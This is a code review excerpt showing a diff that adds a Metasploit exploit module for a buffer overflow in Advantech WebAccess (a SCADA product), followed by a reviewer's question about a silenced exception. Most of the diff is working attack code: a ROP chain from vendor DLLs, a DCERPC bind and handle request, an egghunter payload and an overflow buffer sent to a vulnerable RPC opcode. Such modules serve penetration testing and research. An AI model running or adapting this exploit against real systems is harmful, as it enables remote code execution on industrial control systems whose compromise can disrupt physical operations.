modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb

```diff
@@ -0,0 +1,179 @@
+      0x070467d2,  # NEG EAX # RETN [BwPAlarm.dll]
+      0x0704de61,  # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
+      0x41414141,  # Filler (compensate)
+      0x41414141,  # Filler (compensate)
+      0x41414141,  # Filler (compensate)
+      0x02030af7,  # POP EAX # RETN [BwKrlAPI.dll]
+      0xfbdbcbd5,  # put delta into eax (-> put 0x00001000 into edx)
+      0x02029003,  # ADD EAX,424442B # RETN [BwKrlAPI.dll]
+      0x0201234a,  # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
+      0x07078df5,  # POP EAX # RETN [BwPAlarm.dll]
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x070467d2,  # NEG EAX # RETN [BwPAlarm.dll]
+      0x07011e60,  # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
+      0x0706fe66,  # POP EDI # RETN [BwPAlarm.dll]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x0703d825,  # RETN (ROP NOP) [BwPAlarm.dll]
+      0x0202ca65,  # POP EAX # RETN [BwKrlAPI.dll]
+      0x90909090,  # nop
+      0x07048f5a,  # PUSHAD # RETN [BwPAlarm.dll]
+    ].flatten.pack("V*")
+    return rop_gadgets
+  end
+
+  def exploit
+    connect
+    handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
+    print_status("Binding to #{handle} ...")
+    dcerpc_bind(handle)
+    print_status("Bound to #{handle} ...")
+
+    # send the request to get the handle
+    resp   = dcerpc.call(0x4, [0x02000000].pack('V'))
+    handle = resp.last(4).unpack('V').first
+    print_good("Got a handle: 0x%08x" % handle)
+    egg_options = { :eggtag   => "0day" }
+    egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)
+
+    # apparently this is called a ret chain
+    overflow  = [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Jmp']].pack('V')
+    overflow << [target['Ret']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << [target['Slide']].pack('V')
+    overflow << create_rop_chain()
+    overflow << egghunter
+    overflow << egg
+    overflow << rand_text_alpha(0x1000-overflow.length)
+
+    # sorry but I dont like msf's ndr class.
+    sploit  = [handle].pack('V')
+    sploit << [0x000138bd].pack('V')  # opcode we are attacking
+    sploit << [0x00001000].pack('V')  # size to copy
+    sploit << [0x00001000].pack('V')  # size of string
+    sploit << overflow
+    print_status("Trying target #{target.name}...")
+    begin
+        dcerpc_call(0x1, sploit)
+        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
```

Comment:
Why is this exception silenced? Could we use this rescue to provide useful feedback to the user?